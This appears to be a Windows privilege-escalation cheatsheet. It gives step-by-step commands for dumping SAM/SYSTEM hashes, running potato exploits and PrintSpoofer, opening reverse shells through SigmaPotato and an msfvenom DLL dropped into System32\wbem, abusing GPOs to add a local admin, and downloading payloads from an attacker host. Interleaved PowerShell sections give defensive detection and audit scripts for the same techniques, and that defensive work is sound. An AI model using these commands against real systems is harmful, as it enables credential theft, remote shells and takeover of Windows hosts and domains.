# Exploits

## SeBackupPrivilege

{% stepper %}
{% step %}

### Copy SAM and SYSTEM file

```powershell
reg save hklm\sam C:\Users\<Username>\SAM

reg save hklm\system C:\Users\<Username>\SYSTEM
```

{% endstep %}

{% step %}

### Bring the file to Kali

{% endstep %}

{% step %}

### Dump the hashes

```bash
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
```

{% endstep %}
{% endstepper %}
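The `reg save` step above opens the SAM and SYSTEM hives, which the Security log records as event 4663 when object-access auditing is on and the keys carry a SACL. The following PowerShell is an added defender-side example (not from the original cheatsheet) that pulls those events and reports which process and account touched the hives; the `$Hours` window, the "reg.exe on SYSTEM" filter and the assumption that auditing is configured are mine.

```powershell
# Added example (not part of the original cheatsheet): surface Security events that record a
# process opening the SAM or SYSTEM registry hive, which is what `reg save hklm\sam` causes.
# Assumption: "Audit Object Access" is enabled and HKLM\SAM / HKLM\SYSTEM carry an audit SACL;
# without that, event 4663 is never written and this search returns nothing.
param(
    [int]$Hours = 24   # how far back to look; constructed default
)

$since  = (Get-Date).AddHours(-$Hours)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663; StartTime = $since } `
                       -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # Read the named EventData fields from the event XML instead of relying on Properties[] positions.
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    # Any open of the SAM hive is worth a look. HKLM\SYSTEM is read constantly by normal software,
    # so for that hive only flag reg.exe, the tool the cheatsheet step uses.
    $hitSam    = $data.ObjectName -match '\\REGISTRY\\MACHINE\\SAM($|\\)'
    $hitSystem = ($data.ObjectName -match '\\REGISTRY\\MACHINE\\SYSTEM($|\\)') -and
                 ($data.ProcessName -like '*\reg.exe')

    if ($hitSam -or $hitSystem) {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            User    = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
            Process = $data.ProcessName
            Object  = $data.ObjectName
            Access  = $data.AccessMask
        }
    }
}
```

Run it from an elevated prompt on the host being reviewed; a `reg.exe` entry against `\REGISTRY\MACHINE\SAM` from a non-administrative account is the pattern this section's first step leaves behind.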

## SeImpersonatePrivilege

### SigmaPotato.exe

{% code overflow="wrap" %}

```bash
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
```

{% endcode %}

{% stepper %}
{% step %}

### Download SigmaPotato.exe into target machine

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/SigmaPotato.exe -OutFile SigmaPotato.exe
```

{% endcode %}
{% endstep %}

{% step %}

### Execute command

```powershell
./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>
```

{% endstep %}
{% endstepper %}

### PrintSpoofer.exe

```bash
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
```

```bash
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
```

{% stepper %}
{% step %}

### Download PrintSpoofer.exe

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/PrintSpoofer[64 / 32].exe -OutFile PrintSpoofer[64 / 32].exe
```

{% endcode %}
{% endstep %}

{% step %}

### Execute Command

```powershell
PrintSpoofer.exe -i -c <Command To Execute>
```

{% endstep %}
{% endstepper %}

### GodPotato.exe

> **NOTE: Check the installed .NET Framework version first, so you pick the matching GodPotato build:**
>
> ```powershell
> reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
> ```

{% code overflow="wrap" %}

```bash
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe
```

{% endcode %}

{% code overflow="wrap" %}

```bash
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
```

{% endcode %}

{% code overflow="wrap" %}

```bash
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe
```

{% endcode %}

{% stepper %}
{% step %}

### Download GodPotato.exe

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/GodPotato-[Version].exe -OutFile GodPotato.exe
```

{% endcode %}
{% endstep %}

{% step %}

### Execute command

```powershell
./GodPotato.exe -cmd "<Command to execute>"
```

{% endstep %}
{% endstepper %}

## SeRestorePrivilege

### SeRestoreAbuse.exe

```bash
wget https://github.com/dxnboy/redteam/raw/refs/heads/master/SeRestoreAbuse.exe
```

{% stepper %}
{% step %}

### Create a reverse shell

{% endstep %}

{% step %}

### Download SeRestoreAbuse.exe and Shell File

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/SeRestoreAbuse.exe -OutFile SeRestoreAbuse.exe

iwr -Uri http://<Kali IP Address>/<Shell File Name> -OutFile <Shell File Name>
```

{% endcode %}
{% endstep %}

{% step %}

### Execute command

```powershell
.\SeRestoreAbuse.exe <Full Path to Shell File>
```

{% endstep %}
{% endstepper %}
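Every technique in the SeBackupPrivilege, SeImpersonatePrivilege and SeRestorePrivilege sections above only works for accounts that actually hold the privilege, so the defensive counterpart is knowing who holds them. The script below is an added example, not part of the original cheatsheet: it exports the local security policy with `secedit`, parses the `[Privilege Rights]` section and resolves each SID, then warns about holders outside a baseline. The `$expected` list is an assumption you should adjust; SeManageVolumePrivilege is included because the next section relies on it.

```powershell
# Added example (not part of the original cheatsheet): list which accounts are assigned the
# privileges abused in the sections above. Requires an elevated prompt (secedit exports local policy).
$privileges = 'SeBackupPrivilege', 'SeRestorePrivilege', 'SeImpersonatePrivilege', 'SeManageVolumePrivilege'

$cfg = Join-Path $env:TEMP 'secpol-export.inf'
# secedit writes the policy as an INI-style file; [Privilege Rights] holds lines such as
#   SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
secedit /export /cfg $cfg /quiet | Out-Null

$inSection = $false
$results = foreach ($line in Get-Content $cfg) {
    if ($line -match '^\[(.+)\]$') { $inSection = ($Matches[1] -eq 'Privilege Rights'); continue }
    if (-not $inSection -or $line -notmatch '^(Se\w+)\s*=\s*(.*)$') { continue }
    $name, $holders = $Matches[1], $Matches[2]
    if ($privileges -notcontains $name) { continue }

    foreach ($sid in ($holders -split ',' | ForEach-Object { $_.Trim().TrimStart('*') } | Where-Object { $_ })) {
        try {
            $account = ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                           [System.Security.Principal.NTAccount]).Value
        } catch {
            $account = $sid   # unresolvable SID (e.g. a deleted account) is shown raw
        }
        [pscustomobject]@{ Privilege = $name; Account = $account; Sid = $sid }
    }
}
Remove-Item $cfg -ErrorAction SilentlyContinue

# Assumption: Administrators, Backup Operators and the built-in service SIDs are the expected holders.
# Anything else in the list can run the steps in the sections above and should be reviewed.
$expected = 'S-1-5-32-544', 'S-1-5-32-551', 'S-1-5-19', 'S-1-5-20', 'S-1-5-6'

$results | Sort-Object Privilege, Account | Format-Table -AutoSize
$results | Where-Object { $expected -notcontains $_.Sid } | ForEach-Object {
    Write-Warning "$($_.Account) holds $($_.Privilege)"
}
```

The same assignment can be corrected through `secpol.msc` or a GPO under User Rights Assignment; the script only reports, it does not change anything.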

## SeManageVolumePrivilege

{% code overflow="wrap" %}

```bash
wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
```

{% endcode %}

{% stepper %}
{% step %}

### Download SeManageVolumeExploit.exe

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/SeManageVolumeExploit.exe -OutFile SeManageVolumeExploit.exe
```

{% endcode %}
{% endstep %}

{% step %}

### Execute command

```powershell
.\SeManageVolumeExploit.exe
```

{% endstep %}

{% step %}

### Create a reverse shell DLL

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f dll -o C:\Windows\System32\wbem\tzres.dll
```

{% endcode %}
{% endstep %}

{% step %}

### Trigger the DLL

```powershell
systeminfo
```

{% endstep %}
{% endstepper %}
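The last two steps depend on being able to drop `tzres.dll` into `C:\Windows\System32\wbem`, where `systeminfo` picks it up; the genuine `tzres.dll` lives directly in `System32`, not in `wbem`. As an added defender-side example (not from the original cheatsheet), the script below checks for a planted copy and for write access to the `wbem` directory by anyone other than the expected system principals. The `$trusted` list and the write-right mask are my assumptions.

```powershell
# Added example (not part of the original cheatsheet): two checks for the DLL-hijack step above.
# 1. System32\wbem should not contain tzres.dll; a file there is a strong sign the technique was used.
# 2. Only TrustedInstaller, SYSTEM and Administrators should be able to write into wbem; any other
#    write ACE means the directory can already be tampered with.
$wbem    = Join-Path $env:SystemRoot 'System32\wbem'
$planted = Join-Path $wbem 'tzres.dll'

if (Test-Path $planted) {
    $sig  = Get-AuthenticodeSignature $planted
    $hash = (Get-FileHash $planted -Algorithm SHA256).Hash
    Write-Warning "Unexpected $planted (signature: $($sig.Status), SHA256: $hash)"
} else {
    "No tzres.dll in $wbem"
}

# Rights that let a principal create, replace or remove files in the directory (assumed mask).
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles'
$trusted   = 'NT SERVICE\TrustedInstaller', 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators'

# FileSystemRights is cast to [int] because some ACEs carry generic-right bits the enum cannot name.
(Get-Acl $wbem).Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights) -band $writeMask) -ne 0 -and
        $trusted -notcontains $_.IdentityReference.Value
    } |
    ForEach-Object { Write-Warning "$($_.IdentityReference) can write to $wbem ($($_.FileSystemRights))" }
```

A hit on either check is worth correlating with the privilege audit for SeManageVolumePrivilege, since that privilege is what lets a standard user reach the directory in the first place.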

## GPO Abuse

{% code overflow="wrap" %}

```bash
wget https://github.com/byronkg/SharpGPOAbuse/raw/refs/heads/main/SharpGPOAbuse-master/SharpGPOAbuse.exe
```

{% endcode %}

{% stepper %}
{% step %}

### Download SharpGPOAbuse.exe

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
```

{% endcode %}
{% endstep %}

{% step %}

### Run command

{% code overflow="wrap" %}

```powershell
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Username> --GPOName "<GPO DisplayName>"
```

{% endcode %}
{% endstep %}

{% step %}

### Force Group Policy to update

```powershell
gpupdate /force
```

{% endstep %}
{% endstepper %}
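`SharpGPOAbuse --AddLocalAdmin` only works when the account can edit the target GPO, so the precondition to audit for is edit rights held by principals outside the GPO administration groups. The following is an added example, not part of the original cheatsheet or the SharpGPOAbuse project: it walks every GPO with the RSAT `GroupPolicy` module, lists non-baseline trustees with `GpoEdit` or `GpoEditDeleteModifySecurity`, and separately lists GPOs modified in the last week (the `$expectedEditors` baseline and the 7-day window are assumptions).

```powershell
# Added example (not part of the original cheatsheet): find GPOs that principals outside the
# expected admin groups can edit, and GPOs changed recently. Needs RSAT GroupPolicy and read
# access to GPO permissions in the domain.
Import-Module GroupPolicy

# Assumption: extend with the delegated GPO admin groups used in your domain.
$expectedEditors = 'Domain Admins', 'Enterprise Admins', 'SYSTEM', 'ENTERPRISE DOMAIN CONTROLLERS'
$editRights      = 'GpoEdit', 'GpoEditDeleteModifySecurity'

$allGpos = Get-GPO -All

$findings = foreach ($gpo in $allGpos) {
    foreach ($perm in Get-GPPermission -Guid $gpo.Id -All) {
        if ($editRights -notcontains $perm.Permission) { continue }
        if ($expectedEditors -contains $perm.Trustee.Name) { continue }
        [pscustomobject]@{
            GPO        = $gpo.DisplayName
            Trustee    = $perm.Trustee.Name
            Permission = $perm.Permission
            Modified   = $gpo.ModificationTime
        }
    }
}

"== GPOs editable by non-baseline principals =="
$findings | Sort-Object Modified -Descending | Format-Table -AutoSize

# A GPO that was both editable by an unexpected trustee and changed recently is the first one to
# inspect; the Restricted Groups or local group settings are where --AddLocalAdmin leaves its mark.
"== GPOs modified in the last 7 days =="
$allGpos | Where-Object { $_.ModificationTime -gt (Get-Date).AddDays(-7) } |
    Select-Object DisplayName, ModificationTime, @{ n = 'Version'; e = { $_.Computer.DSVersion } } |
    Sort-Object ModificationTime -Descending | Format-Table -AutoSize
```

`Get-GPOReport -Guid <id> -ReportType Xml` on a flagged GPO shows the exact computer-side settings, so the added local administrator entry can be confirmed and removed.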

## SearchSploit

{% stepper %}
{% step %}

### Windows Enumeration

Identify OS name, version, architecture

```powershell
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
```

```powershell
wmic os get Caption, Version, OSArchitecture
```

> **NOTE:** Look up the Windows build number [here](https://en.wikipedia.org/wiki/List_of_Microsoft_Windows_versions).

{% endstep %}

{% step %}

### Search exploit in SearchSploit

```bash
searchsploit <Key Word>
```

> **EXAMPLE:**
>
> {% code overflow="wrap" %}
>
> ```bash
> searchsploit "Windows Kernel Build <Build Number> Local Privilege Escalation"
> ```
>
> {% endcode %}

{% endstep %}

{% step %}

### Download exploit

```bash
searchsploit -m <EDB-ID>
```

{% endstep %}
{% endstepper %}

## Run as another user

### Interactive session (runas prompts for the password)

```powershell
runas /user:<Domain Name>\<Username> cmd.exe
```

### Non-interactive session (RunasCs)

{% code overflow="wrap" %}

```bash
wget https://raw.githubusercontent.com/antonioCoco/RunasCs/refs/heads/master/Invoke-RunasCs.ps1
```

{% endcode %}

{% stepper %}
{% step %}

### Download Invoke-RunasCs.ps1

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/Invoke-RunasCs.ps1 -OutFile Invoke-RunasCs.ps1
```

{% endcode %}
{% endstep %}

{% step %}

### Run command

```powershell
Invoke-RunasCs -Username <Username> -Password <Password> -Command "<Command>"
```

{% endstep %}
{% endstepper %}

